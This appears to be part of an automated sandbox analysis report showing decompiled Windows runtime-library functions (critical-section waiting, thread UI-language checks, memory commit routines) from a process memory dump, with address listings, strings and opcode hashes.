														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00A3FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xaf7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xaf7b84 = _t75;
						_t73 = E00A1EB70(_t134, 0xaf7b60);
						if( *0xaf7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00A1FF60( *0xaf7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                          0x00a3fab0
                                                                                                                          0x00a3fab2
                                                                                                                          0x00a3fab3
                                                                                                                          0x00a3fab4
                                                                                                                          0x00a3fabc
                                                                                                                          0x00a3fac0
                                                                                                                          0x00a3fb14
                                                                                                                          0x00a3fb17
                                                                                                                          0x00a3fac2
                                                                                                                          0x00a3fac8
                                                                                                                          0x00a3facd
                                                                                                                          0x00a3fad3
                                                                                                                          0x00a3fad3
                                                                                                                          0x00a3fadd
                                                                                                                          0x00a3fb18
                                                                                                                          0x00a3fb1b
                                                                                                                          0x00a3fb1d
                                                                                                                          0x00a3fb1e
                                                                                                                          0x00a3fb1f
                                                                                                                          0x00a3fb20
                                                                                                                          0x00a3fb21
                                                                                                                          0x00a3fb22
                                                                                                                          0x00a3fb23
                                                                                                                          0x00a3fb24
                                                                                                                          0x00a3fb25
                                                                                                                          0x00a3fb26
                                                                                                                          0x00a3fb27
                                                                                                                          0x00a3fb28
                                                                                                                          0x00a3fb29
                                                                                                                          0x00a3fb2a
                                                                                                                          0x00a3fb2b
                                                                                                                          0x00a3fb2c
                                                                                                                          0x00a3fb2d
                                                                                                                          0x00a3fb2e
                                                                                                                          0x00a3fb2f
                                                                                                                          0x00a3fb3a
                                                                                                                          0x00a3fb3b
                                                                                                                          0x00a3fb3e
                                                                                                                          0x00a3fb41
                                                                                                                          0x00a3fb44
                                                                                                                          0x00a3fb47
                                                                                                                          0x00a3fb4a
                                                                                                                          0x00a3fb4d
                                                                                                                          0x00a3fb53
                                                                                                                          0x00a7bdcb
                                                                                                                          0x00a7bdcb
                                                                                                                          0x00a3fb59
                                                                                                                          0x00a3fb5b
                                                                                                                          0x00a3fb5b
                                                                                                                          0x00a3fb5e
                                                                                                                          0x00a7bdd5
                                                                                                                          0x00a7bdd8
                                                                                                                          0x00000000
                                                                                                                          0x00a7bdda
                                                                                                                          0x00000000
                                                                                                                          0x00a7bdda
                                                                                                                          0x00a3fb64
                                                                                                                          0x00a3fb64
                                                                                                                          0x00a3fb64
                                                                                                                          0x00a3fb67
                                                                                                                          0x00a3fb6e
                                                                                                                          0x00a3fb70
                                                                                                                          0x00a3fb72
                                                                                                                          0x00000000
                                                                                                                          0x00a3fb78
                                                                                                                          0x00a3fb7a
                                                                                                                          0x00a3fb7a
                                                                                                                          0x00a3fb7d
                                                                                                                          0x00a3fb80
                                                                                                                          0x00a7bddf
                                                                                                                          0x00a7bde1
                                                                                                                          0x00000000
                                                                                                                          0x00a7bde3
                                                                                                                          0x00000000
                                                                                                                          0x00a7bde3
                                                                                                                          0x00a3fb86
                                                                                                                          0x00a3fb86
                                                                                                                          0x00a3fb86
                                                                                                                          0x00a3fb8b
                                                                                                                          0x00a3fb90
                                                                                                                          0x00a3fb92
                                                                                                                          0x00a3fb94
                                                                                                                          0x00a3fb9a
                                                                                                                          0x00a3fb9b
                                                                                                                          0x00a3fba1
                                                                                                                          0x00a7bde8
                                                                                                                          0x00a7bdeb
                                                                                                                          0x00a7bded
                                                                                                                          0x00a7beb5
                                                                                                                          0x00a7beb5
                                                                                                                          0x00a7bebb
                                                                                                                          0x00a7bebd
                                                                                                                          0x00a7bec3
                                                                                                                          0x00a7bed2
                                                                                                                          0x00a7bedd
                                                                                                                          0x00a7bedd
                                                                                                                          0x00a7beed
                                                                                                                          0x00000000
                                                                                                                          0x00a7bdf3
                                                                                                                          0x00a7bdfe
                                                                                                                          0x00a7be06
                                                                                                                          0x00a7be0b
                                                                                                                          0x00a7be0d
                                                                                                                          0x00a7be0f
                                                                                                                          0x00a7be14
                                                                                                                          0x00a7be19
                                                                                                                          0x00a7be20
                                                                                                                          0x00a7be25
                                                                                                                          0x00a7be27
                                                                                                                          0x00a7be35
                                                                                                                          0x00a7be39
                                                                                                                          0x00a7be46
                                                                                                                          0x00a7be4f
                                                                                                                          0x00a7be54
                                                                                                                          0x00a7be56
                                                                                                                          0x00a7bef8
                                                                                                                          0x00a7bef8
                                                                                                                          0x00000000
                                                                                                                          0x00a7be5c
                                                                                                                          0x00a7be5c
                                                                                                                          0x00a7be60
                                                                                                                          0x00000000
                                                                                                                          0x00a7be66
                                                                                                                          0x00a7be66
                                                                                                                          0x00a7be7f
                                                                                                                          0x00a7be84
                                                                                                                          0x00a7be87
                                                                                                                          0x00a7be89
                                                                                                                          0x00a7be8b
                                                                                                                          0x00a7be99
                                                                                                                          0x00a7be9d
                                                                                                                          0x00a7bea0
                                                                                                                          0x00a7beac
                                                                                                                          0x00a7beaf
                                                                                                                          0x00a7beb1
                                                                                                                          0x00a7beb3
                                                                                                                          0x00a7beb3
                                                                                                                          0x00000000
                                                                                                                          0x00a7bea2
                                                                                                                          0x00a7bea2
                                                                                                                          0x00000000
                                                                                                                          0x00a7bea2
                                                                                                                          0x00a7be8d
                                                                                                                          0x00a7be8d
                                                                                                                          0x00a7be92
                                                                                                                          0x00000000
                                                                                                                          0x00a7be92
                                                                                                                          0x00a7be8b
                                                                                                                          0x00a7be60
                                                                                                                          0x00a7be3b
                                                                                                                          0x00a7be3b
                                                                                                                          0x00a7be3e
                                                                                                                          0x00000000
                                                                                                                          0x00a7be40
                                                                                                                          0x00a7be40
                                                                                                                          0x00a7be44
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a7be44
                                                                                                                          0x00a7be3e
                                                                                                                          0x00a7be29
                                                                                                                          0x00a7be29
                                                                                                                          0x00000000
                                                                                                                          0x00a7be29
                                                                                                                          0x00a7be27
                                                                                                                          0x00000000
                                                                                                                          0x00a3fba7
                                                                                                                          0x00a3fba7
                                                                                                                          0x00a3fbab
                                                                                                                          0x00a7bf02
                                                                                                                          0x00a3fbb1
                                                                                                                          0x00a3fbb1
                                                                                                                          0x00a3fbb8
                                                                                                                          0x00a3fbbd
                                                                                                                          0x00a3fbbd
                                                                                                                          0x00a3fbbf
                                                                                                                          0x00a3fbbf
                                                                                                                          0x00a3fbc5
                                                                                                                          0x00a3fbcb
                                                                                                                          0x00a3fbf8
                                                                                                                          0x00a3fbf8
                                                                                                                          0x00a3fbfa
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc00
                                                                                                                          0x00a3fc00
                                                                                                                          0x00a3fc03
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc09
                                                                                                                          0x00a3fc09
                                                                                                                          0x00a3fc0f
                                                                                                                          0x00a3fc15
                                                                                                                          0x00a3fc23
                                                                                                                          0x00a3fc23
                                                                                                                          0x00a3fc25
                                                                                                                          0x00a3fc27
                                                                                                                          0x00a3fc75
                                                                                                                          0x00a3fc7c
                                                                                                                          0x00a3fc84
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc29
                                                                                                                          0x00a3fc29
                                                                                                                          0x00a3fc2d
                                                                                                                          0x00a3fc30
                                                                                                                          0x00a7bf0f
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc36
                                                                                                                          0x00a3fc38
                                                                                                                          0x00a3fc3b
                                                                                                                          0x00a3fc41
                                                                                                                          0x00a7bf17
                                                                                                                          0x00a7bf19
                                                                                                                          0x00a7bf48
                                                                                                                          0x00a7bf4b
                                                                                                                          0x00000000
                                                                                                                          0x00a7bf1b
                                                                                                                          0x00a7bf22
                                                                                                                          0x00a7bf24
                                                                                                                          0x00a7bf26
                                                                                                                          0x00000000
                                                                                                                          0x00a7bf2c
                                                                                                                          0x00a7bf37
                                                                                                                          0x00a7bf39
                                                                                                                          0x00a7bf3b
                                                                                                                          0x00000000
                                                                                                                          0x00a7bf41
                                                                                                                          0x00a7bf41
                                                                                                                          0x00a7bf41
                                                                                                                          0x00a7bf41
                                                                                                                          0x00a7bf45
                                                                                                                          0x00000000
                                                                                                                          0x00a7bf45
                                                                                                                          0x00a7bf3b
                                                                                                                          0x00a7bf26
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc47
                                                                                                                          0x00a3fc47
                                                                                                                          0x00a3fc49
                                                                                                                          0x00a3fcb2
                                                                                                                          0x00a3fcb4
                                                                                                                          0x00a3fcb6
                                                                                                                          0x00a3fcdc
                                                                                                                          0x00a3fcdc
                                                                                                                          0x00000000
                                                                                                                          0x00a3fcb8
                                                                                                                          0x00a3fcc3
                                                                                                                          0x00a3fcc5
                                                                                                                          0x00a3fcc7
                                                                                                                          0x00000000
                                                                                                                          0x00a3fcc9
                                                                                                                          0x00a3fcc9
                                                                                                                          0x00a3fccd
                                                                                                                          0x00000000
                                                                                                                          0x00a3fccd
                                                                                                                          0x00a3fcc7
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc4b
                                                                                                                          0x00a3fc4b
                                                                                                                          0x00a3fc4e
                                                                                                                          0x00a3fc4e
                                                                                                                          0x00a3fc51
                                                                                                                          0x00a3fc51
                                                                                                                          0x00a3fc54
                                                                                                                          0x00a3fc5a
                                                                                                                          0x00a3fc5c
                                                                                                                          0x00a3fc5f
                                                                                                                          0x00a3fc61
                                                                                                                          0x00a3fc63
                                                                                                                          0x00a3fc65
                                                                                                                          0x00a3fc67
                                                                                                                          0x00a3fc6e
                                                                                                                          0x00a3fc72
                                                                                                                          0x00a3fc72
                                                                                                                          0x00a3fc72
                                                                                                                          0x00a3fc72
                                                                                                                          0x00a3fc67
                                                                                                                          0x00a3fc61
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc5a
                                                                                                                          0x00a3fc49
                                                                                                                          0x00a3fc41
                                                                                                                          0x00a3fc30
                                                                                                                          0x00a3fc27
                                                                                                                          0x00a3fc03
                                                                                                                          0x00a3fbcd
                                                                                                                          0x00a3fbd3
                                                                                                                          0x00a3fbd9
                                                                                                                          0x00a3fbdc
                                                                                                                          0x00a3fbde
                                                                                                                          0x00a3fc99
                                                                                                                          0x00a3fc9b
                                                                                                                          0x00a3fc9d
                                                                                                                          0x00a3fcd5
                                                                                                                          0x00a3fcd5
                                                                                                                          0x00a3fc89
                                                                                                                          0x00a3fc89
                                                                                                                          0x00000000
                                                                                                                          0x00a3fc9f
                                                                                                                          0x00a3fc9f
                                                                                                                          0x00a3fca3
                                                                                                                          0x00000000
                                                                                                                          0x00a3fca3
                                                                                                                          0x00000000
                                                                                                                          0x00a3fbe4
                                                                                                                          0x00a3fbe4
                                                                                                                          0x00a3fbe4
                                                                                                                          0x00a3fbe4
                                                                                                                          0x00a3fbe9
                                                                                                                          0x00a3fbf2
                                                                                                                          0x00000000
                                                                                                                          0x00a3fbf2
                                                                                                                          0x00a3fbde
                                                                                                                          0x00a3fbcb
                                                                                                                          0x00a3fbab
                                                                                                                          0x00a3fc8b
                                                                                                                          0x00a3fc8b
                                                                                                                          0x00a3fc8c
                                                                                                                          0x00a3fb80
                                                                                                                          0x00a3fb72
                                                                                                                          0x00a3fb5e
                                                                                                                          0x00a3fc8d
                                                                                                                          0x00a3fc91
                                                                                                                          0x00a3fadf
                                                                                                                          0x00a3fadf
                                                                                                                          0x00a3fae1
                                                                                                                          0x00a3fae4
                                                                                                                          0x00a3fae7
                                                                                                                          0x00a3faec
                                                                                                                          0x00a3faf8
                                                                                                                          0x00a3fb00
                                                                                                                          0x00a3fb07
                                                                                                                          0x00a3fb0f
                                                                                                                          0x00a3fb0f
                                                                                                                          0x00a3fb07
                                                                                                                          0x00000000
                                                                                                                          0x00a3faf8
                                                                                                                          0x00a3fadd

                                                                                                                          Strings
                                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A7BE0F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                          • API String ID: 0-865735534
                                                                                                                          • Opcode ID: 678f71b9a74653d507a21e74b91770333a2b13a8404b985ba706984afee7bb33
                                                                                                                          • Instruction ID: bc6e2c0a9d6e0c69ba05f89c3d88447d4a913a3567b442c3d3b2d5fab56a27ff
                                                                                                                          • Opcode Fuzzy Hash: 678f71b9a74653d507a21e74b91770333a2b13a8404b985ba706984afee7bb33
                                                                                                                          • Instruction Fuzzy Hash: 4AA1CFB1E206099FDB25DF68C850BBAB3B5AB48710F14857AF806DB791DB34DC41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A02D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E00A02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xaf5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xaf7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00A497C0();
				}
				if( *0xaf79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xaf79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00A31624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00A27D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00A9FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00A49520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00A3E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00A5DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xaf6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xaf6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00A49980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00A495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00A27D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00A27D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00A87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00A9FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xaf5350;
							if(_t109 != 0xaf5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00A9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00A95720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                          0x00a02d8a
                                                                                                                          0x00a02d8a
                                                                                                                          0x00a02d92
                                                                                                                          0x00a02d96
                                                                                                                          0x00a02d9e
                                                                                                                          0x00a02da0
                                                                                                                          0x00a02da3
                                                                                                                          0x00a02da5
                                                                                                                          0x00a02da8
                                                                                                                          0x00a02dab
                                                                                                                          0x00a02db2
                                                                                                                          0x00a5f9aa
                                                                                                                          0x00a5f9ab
                                                                                                                          0x00a5f9ae
                                                                                                                          0x00a5f9ae
                                                                                                                          0x00a02db8
                                                                                                                          0x00a02dc2
                                                                                                                          0x00a5f9b9
                                                                                                                          0x00a5f9be
                                                                                                                          0x00a5f9bf
                                                                                                                          0x00a5f9bf
                                                                                                                          0x00a02dcf
                                                                                                                          0x00a5f9c9
                                                                                                                          0x00a02dd5
                                                                                                                          0x00a02dd5
                                                                                                                          0x00a02dd5
                                                                                                                          0x00a02dde
                                                                                                                          0x00a02de1
                                                                                                                          0x00a02e70
                                                                                                                          0x00a02e72
                                                                                                                          0x00a02e72
                                                                                                                          0x00a02de7
                                                                                                                          0x00a02deb
                                                                                                                          0x00a02e7c
                                                                                                                          0x00a02e83
                                                                                                                          0x00a02e85
                                                                                                                          0x00a02e8b
                                                                                                                          0x00a02e8d
                                                                                                                          0x00a02e92
                                                                                                                          0x00a02e92
                                                                                                                          0x00a02e85
                                                                                                                          0x00a02df1
                                                                                                                          0x00a02df7
                                                                                                                          0x00a02df9
                                                                                                                          0x00a02df9
                                                                                                                          0x00a02dfc
                                                                                                                          0x00a02dff
                                                                                                                          0x00a02e02
                                                                                                                          0x00000000
                                                                                                                          0x00a02e05
                                                                                                                          0x00a02e0c
                                                                                                                          0x00a5f9d9
                                                                                                                          0x00a02e12
                                                                                                                          0x00a02e12
                                                                                                                          0x00a02e12
                                                                                                                          0x00a02e1a
                                                                                                                          0x00a5f9e3
                                                                                                                          0x00a5f9e9
                                                                                                                          0x00a5f9f0
                                                                                                                          0x00a5f9f6
                                                                                                                          0x00a5f9f8
                                                                                                                          0x00a5f9f8
                                                                                                                          0x00a5f9f0
                                                                                                                          0x00a02e23
                                                                                                                          0x00a5fa02
                                                                                                                          0x00a5fa03
                                                                                                                          0x00a5fa05
                                                                                                                          0x00a5fa06
                                                                                                                          0x00000000
                                                                                                                          0x00a02e29
                                                                                                                          0x00a02e29
                                                                                                                          0x00a02e2e
                                                                                                                          0x00a02e34
                                                                                                                          0x00a02e3e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a02e44
                                                                                                                          0x00a02e47
                                                                                                                          0x00a02e4d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a02e4f
                                                                                                                          0x00a02e54
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a02e5a
                                                                                                                          0x00a02e5f
                                                                                                                          0x00a02e9a
                                                                                                                          0x00a02ea4
                                                                                                                          0x00a02ea5
                                                                                                                          0x00a02ea8
                                                                                                                          0x00a02eaf
                                                                                                                          0x00a02eb2
                                                                                                                          0x00a02eb5
                                                                                                                          0x00a5fae9
                                                                                                                          0x00a5faeb
                                                                                                                          0x00a5faed
                                                                                                                          0x00a5faef
                                                                                                                          0x00a5faf7
                                                                                                                          0x00a5faf8
                                                                                                                          0x00a5fafd
                                                                                                                          0x00a5faff
                                                                                                                          0x00a5fb04
                                                                                                                          0x00a5fb04
                                                                                                                          0x00a5faff
                                                                                                                          0x00a02ec0
                                                                                                                          0x00a02ec4
                                                                                                                          0x00a02ec6
                                                                                                                          0x00a02ec8
                                                                                                                          0x00a5fb14
                                                                                                                          0x00a5fb18
                                                                                                                          0x00a5fb1e
                                                                                                                          0x00a5fb21
                                                                                                                          0x00a5fb21
                                                                                                                          0x00a02ece
                                                                                                                          0x00a02ece
                                                                                                                          0x00a02ece
                                                                                                                          0x00a02ed7
                                                                                                                          0x00a02e61
                                                                                                                          0x00a02e63
                                                                                                                          0x00a5fa6b
                                                                                                                          0x00a5fa71
                                                                                                                          0x00a5fa76
                                                                                                                          0x00a5fa78
                                                                                                                          0x00a5fa8a
                                                                                                                          0x00a5fa7a
                                                                                                                          0x00a5fa83
                                                                                                                          0x00a5fa83
                                                                                                                          0x00a5fa8f
                                                                                                                          0x00a5fa91
                                                                                                                          0x00a5fa97
                                                                                                                          0x00a5fa9d
                                                                                                                          0x00a5faa4
                                                                                                                          0x00a5faaa
                                                                                                                          0x00a5faaf
                                                                                                                          0x00a5fab1
                                                                                                                          0x00a5fac3
                                                                                                                          0x00a5fab3
                                                                                                                          0x00a5fabc
                                                                                                                          0x00a5fabc
                                                                                                                          0x00a5fac8
                                                                                                                          0x00a5facb
                                                                                                                          0x00a5fadf
                                                                                                                          0x00a5fadf
                                                                                                                          0x00a5facb
                                                                                                                          0x00a5faa4
                                                                                                                          0x00a5fa91
                                                                                                                          0x00a02e6f
                                                                                                                          0x00a02e6f
                                                                                                                          0x00a02e5f
                                                                                                                          0x00a5fa13
                                                                                                                          0x00a5fa15
                                                                                                                          0x00a5fa17
                                                                                                                          0x00a5fa1f
                                                                                                                          0x00a5fa21
                                                                                                                          0x00a5fa22
                                                                                                                          0x00a5fa25
                                                                                                                          0x00a5fa28
                                                                                                                          0x00a5fa2f
                                                                                                                          0x00a5fa2f
                                                                                                                          0x00a5fa2a
                                                                                                                          0x00a5fa2a
                                                                                                                          0x00a5fa2a
                                                                                                                          0x00a5fa31
                                                                                                                          0x00a5fa34
                                                                                                                          0x00a5fa36
                                                                                                                          0x00a5fa3c
                                                                                                                          0x00a5fa3e
                                                                                                                          0x00a5fa41
                                                                                                                          0x00a5fa43
                                                                                                                          0x00a5fa45
                                                                                                                          0x00a5fa45
                                                                                                                          0x00a5fa41
                                                                                                                          0x00a5fa3c
                                                                                                                          0x00a5fa4a
                                                                                                                          0x00a5fa4f
                                                                                                                          0x00a5fa51
                                                                                                                          0x00a5fa53
                                                                                                                          0x00a5fa56
                                                                                                                          0x00a5fa5b
                                                                                                                          0x00a5fa5e
                                                                                                                          0x00000000
                                                                                                                          0x00a5fa5e
                                                                                                                          0x00a02e23

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RTL: Re-Waiting
                                                                                                                          • API String ID: 0-316354757
                                                                                                                          • Opcode ID: b4bbc844304ad7ceca59276098ff45f6bf167210b1f2e32bb517d48407d4eeb0
                                                                                                                          • Instruction ID: 8bc2d5c7929adad35e1dfc8db80773d97d529185e3e11ab4d5bb07766c99be71
                                                                                                                          • Opcode Fuzzy Hash: b4bbc844304ad7ceca59276098ff45f6bf167210b1f2e32bb517d48407d4eeb0
                                                                                                                          • Instruction Fuzzy Hash: EE613230A00708EFDB22DB68D888B7EBBB5FB40354F240279E915972C2C7349D05C782
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AD0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00AD0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00ACFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00AD1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00A49730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00ACA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00ACA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xaf8b04 >> 0x14) + (_v44 -  *0xaf8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00A27D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00AC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00A27D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00ABFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xaf8724 & 0x00000008) != 0) {
						E00AC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00AD15B5(0xaf8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                          0x00ad0eb7
                                                                                                                          0x00ad0eb9
                                                                                                                          0x00ad0ec0
                                                                                                                          0x00ad0ec2
                                                                                                                          0x00ad0ecd
                                                                                                                          0x00ad105b
                                                                                                                          0x00ad105b
                                                                                                                          0x00ad1061
                                                                                                                          0x00ad1066
